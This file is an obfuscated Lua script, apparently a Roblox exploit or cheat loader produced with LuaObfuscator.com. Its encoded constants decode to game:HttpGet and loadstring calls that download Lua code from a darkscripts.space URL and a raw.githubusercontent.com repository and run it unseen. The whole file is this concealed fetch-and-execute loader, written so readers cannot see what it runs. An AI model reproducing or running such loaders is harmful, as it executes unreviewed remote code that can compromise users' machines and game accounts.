--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=v5(v81,v19);v19=nil;return v87;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -(1 + 0))) -(v32-(620 -(555 + 64)))) + ((1328 -396) -((1922 -(68 + 997)) + 74)))) ;return v82-(v82%1) ;else local v83=568 -(367 + 201) ;local v84;while true do if (v83==(927 -(214 + 713))) then v84=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (878 -(282 + 595))) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + 13056783)) + (v39 * 65536) + (v38 * ((2893 -1680) -((1648 -756) + 65))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=(1 + 0) -0 ;local v44=(v20(v42,792 -(368 + 423) ,370 -(87 + 263) ) * ((182 -(67 + 113))^(24 + 8))) + v41 ;local v45=v20(v42,51 -30 ,23 + 8 );local v46=((v20(v42,127 -95 )==(953 -((2520 -1718) + 150))) and  -1) or (2 -1) ;if (v45==(0 -0)) then if (v44==0) then return v46 * (0 + 0) ;else local v88=997 -(915 + 82) ;while true do if (v88==(0 -0)) then v45=1 + 0 ;v43=0 -0 ;break;end end end elseif (v45==((3252 -(10 + 8)) -(1069 + 118))) then return ((v44==(0 -0)) and (v46 * ((1 -(0 -0))/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((3 -(443 -(416 + 26)))^52))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==0) then return "";end end v48=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;local v49={};for v64=1 + 0 , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return 0;end)();local v51=(function() return;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do local v66=(function() return 0;end)();while true do if (v66==0) then local v89=(function() return 261 -(241 + 20) ;end)();while true do if (v89==1) then v66=(function() return 1;end)();break;end if (v89==(0 -0)) then if (v50~=(2 + 1)) then else for v100= #"!",v23() do local v101=(function() return v21();end)();if (v20(v101, #":", #"!")==0) then local v108=(function() return 438 -(262 + 176) ;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (0==v108) then v109=(function() return v20(v101,1723 -(345 + 1376) , #"91(");end)();v110=(function() return v20(v101, #"asd1",694 -(198 + 490) );end)();v108=(function() return 4 -3 ;end)();end if (v108==(4 -2)) then if (v20(v110, #"}", #">")== #"]") then v111[1208 -(696 + 510) ]=(function() return v57[v111[3 -1 ]];end)();end if (v20(v110,1264 -(1091 + 171) ,1 + 1 )~= #"\\") then else v111[ #"xxx"]=(function() return v57[v111[ #"91("]];end)();end v108=(function() return 3;end)();end if ((3 -2)~=v108) then else local v138=(function() return 0;end)();while true do if (v138==1) then v108=(function() return 2;end)();break;end if (v138==(0 -0)) then v111=(function() return {v22(),v22(),nil,nil};end)();if (v109==0) then local v171=(function() return 374 -(123 + 251) ;end)();local v172=(function() return;end)();while true do if (v171==(0 -0)) then v172=(function() return 698 -(208 + 490) ;end)();while true do if (v172~=(0 + 0)) then else v111[ #"gha"]=(function() return v22();end)();v111[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v109== #" ") then v111[ #"asd"]=(function() return v23();end)();elseif (v109==(1 + 1)) then v111[ #"asd"]=(function() return v23() -((838 -(660 + 176))^(2 + 14)) ;end)();elseif (v109~= #"xnx") then else local v180=(function() return 0;end)();local v181=(function() return;end)();while true do if (v180==(202 -(14 + 188))) then v181=(function() return 0;end)();while true do if (v181==(675 -(534 + 141))) then v111[ #"nil"]=(function() return v23() -((1 + 1)^16) ;end)();v111[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v138=(function() return 1 + 0 ;end)();end end end if (3==v108) then if (v20(v110, #"xnx", #"asd")~= #"}") then else v111[ #"0836"]=(function() return v57[v111[ #"asd1"]];end)();end v52[v100]=(function() return v111;end)();break;end end end end for v102= #"~",v23() do v53,v102,v28=(function() return v51(v53,v102,v28);end)();end return v55;end if (v50~=(0 + 0)) then else local v98=(function() return 0 -0 ;end)();while true do if (v98~=(0 -0)) then else v51=(function() return function(v130,v131,v132) local v133=(function() return 0;end)();local v134=(function() return;end)();while true do if (v133~=0) then else v134=(function() return 0 -0 ;end)();while true do if (v134~=0) then else v130[v131-#"{" ]=(function() return v132();end)();return v130,v131,v132;end end break;end end end;end)();v52=(function() return {};end)();v98=(function() return 1;end)();end if (v98==(1 + 0)) then v53=(function() return {};end)();v50=(function() return 1;end)();break;end end end v89=(function() return 1;end)();end end end if (v66==1) then if (v50==(1 + 0)) then local v96=(function() return 396 -(115 + 281) ;end)();while true do if (v96==(0 -0)) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v96=(function() return 2 -1 ;end)();end if (v96==(3 -2)) then v56=(function() return v23();end)();v50=(function() return 2;end)();break;end end end if (v50==(869 -(550 + 317))) then local v97=(function() return 0;end)();while true do if ((0 -0)==v97) then v57=(function() return {};end)();for v103= #"!",v56 do local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104~=(0 -0)) then else v105=(function() return 285 -(134 + 151) ;end)();v106=(function() return nil;end)();v104=(function() return 1666 -(970 + 695) ;end)();end if (v104==1) then v107=(function() return nil;end)();while true do if (v105==(0 -0)) then v106=(function() return v21();end)();v107=(function() return nil;end)();v105=(function() return 1991 -(582 + 1408) ;end)();end if (v105==(3 -2)) then if (v106== #"!") then v107=(function() return v21()~=0 ;end)();elseif (v106==2) then v107=(function() return v24();end)();elseif (v106~= #"asd") then else v107=(function() return v25();end)();end v57[v103]=(function() return v107;end)();break;end end break;end end end v97=(function() return 1 -0 ;end)();end if ((3 -2)==v97) then v55[ #"gha"]=(function() return v21();end)();v50=(function() return 1827 -(1195 + 629) ;end)();break;end end end break;end end end end local function v29(v58,v59,v60) local v61=v58[1];local v62=v58[2 -0 ];local v63=v58[(309 -(30 + 35)) -(187 + 54) ];return function(...) local v67=v61;local v68=v62;local v69=v63;local v70=v27;local v71=781 -(162 + 618) ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -(1 -0) ;local v76={};local v77={};for v85=0 -0 ,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 + 0 ];else v77[v85]=v74[v85 + (1637 -(1373 + 263)) ];end end local v78=(v75-v69) + (1001 -(451 + 549)) ;local v79;local v80;while true do local v86=0 + 0 + (1257 -(1043 + 214)) ;while true do if (v86==(0 -0)) then v79=v67[v71];v80=v79[1 -0 ];v86=1385 -(746 + (2411 -1773)) ;end if (1==v86) then if ((v80<=((1216 -(323 + 889)) + 5)) or (3275==1804)) then if (v80<=(5 -(2 -1))) then if (v80<=(342 -(218 + 123))) then if (v80==(1581 -(1535 + 46))) then local v112=v79[2 + 0 ];local v113,v114=v70(v77[v112](v13(v77,v112 + 1 + 0 ,v79[3])));v72=(v114 + v112) -(561 -((886 -(361 + 219)) + 254)) ;local v115=0;for v135=v112,v72 do v115=v115 + (321 -(53 + 267)) + 0 ;v77[v135]=v113[v115];end else v77[v79[3 -1 ]]=v79[1470 -(899 + 568) ]~=(0 + 0) ;end elseif (v80<=(4 -2)) then v77[v79[(137 + 468) -(268 + (748 -(15 + 398))) ]]=v79[3];elseif (v80>(293 -(60 + 230))) then local v140=982 -(18 + 964) ;local v141;local v142;local v143;local v144;while true do if ((574 -(426 + 146))==v140) then for v169=v141,v72 do local v170=0 + 0 ;while true do if (v170==((5480 -4024) -(282 + 1174))) then v144=v144 + 1 ;v77[v169]=v142[v144];break;end end end break;end if (v140==(811 -(569 + 141 + 101))) then v141=v79[5 -3 ];v142,v143=v70(v77[v141](v13(v77,v141 + 1 + 0 ,v79[1027 -(706 + 318) ])));v140=1252 -(721 + 530) ;end if ((v140==(1272 -(945 + 326))) or (1417>3629)) then v72=(v143 + v141) -(2 -(1 + 0)) ;v144=0 + 0 ;v140=(1552 -(20 + 830)) -(271 + 429) ;end end else v77[v79[2 + 0 + 0 ]]=v79[1503 -(1408 + 92) ]~=0 ;end elseif (v80<=(1092 -(461 + 625))) then if (v80>5) then v77[v79[2]]=v60[v79[3]];else do return;end end elseif ((4795>402) and (v80<=(1295 -(993 + 295)))) then v77[v79[1 + 1 ]]=v79[1174 -(418 + 753) ];elseif (v80==(4 + 4)) then v77[v79[128 -(116 + 10) ]]();else local v146=0 + 0 ;local v147;while true do if ((0 + 0)==v146) then v147=v79[1 + (739 -(542 + 196)) ];v77[v147]=v77[v147](v13(v77,v147 + 1 ,v72));break;end end end elseif ((4813>3565) and (v80<=((8 -4) + 10))) then if (v80<=11) then if ((3912==3912) and (v80==(539 -(406 + 123)))) then v71=v79[3];elseif (v77[v79[2]]==v79[1773 -(1749 + 20) ]) then v71=v71 + 1 ;else v71=v79[1 + 2 ];end elseif (v80<=12) then local v124=v79[1324 -(1249 + 73) ];v77[v124]=v77[v124](v13(v77,v124 + 1 + 0 ,v72));elseif ((2821<=4824) and (v80==13)) then local v149=v79[1147 -(466 + 679) ];local v150=v77[v79[3]];v77[v149 + (2 -1) ]=v150;v77[v149]=v150[v79[11 -7 ]];else do return;end end elseif ((1738<=2195) and (v80<=(1916 -(31 + 75 + 912 + 882)))) then if ((41<=3018) and (v80>(5 + 10))) then v77[v79[1 + 1 ]]();else local v126=0 -0 ;local v127;local v128;while true do if ((2145<=4104) and (v126==(2 -1))) then v77[v127 + (115 -(4 + 110)) ]=v128;v77[v127]=v128[v79[4]];break;end if ((584 -(57 + 527))==v126) then v127=v79[1429 -(41 + 1386) ];v128=v77[v79[106 -(17 + 86) ]];v126=1;end end end elseif ((2689<4845) and (v80<=(12 + 5))) then v71=v79[6 -3 ];elseif (v80>(52 -(13 + 21))) then if (v77[v79[168 -(122 + 44) ]]==v79[6 -2 ]) then v71=v71 + 1 ;else v71=v79[9 -6 ];end else v77[v79[2 + 0 ]]=v60[v79[1 + 2 ]];end v71=v71 + (1 -0) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F2Q396439343233352D396532642D343839612D396665332D363166643934373266302Q645F39332Q3633303134393735383231343239362E6C756103473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53702Q6564584875622F50732Q39747273632F726566732F68656164732F6D61696E2F476700153Q0012023Q00013Q0026133Q0001000100010004113Q00010001001206000100023Q001206000200033Q00200D000200020004001202000400054Q0001000500014Q0004000200054Q000900013Q00022Q0010000100010001001206000100023Q001206000200033Q00200D000200020004001202000400064Q0004000200044Q000900013Q00022Q00100001000100010004113Q001400010004113Q000100012Q000E3Q00017Q00",v9(),...);
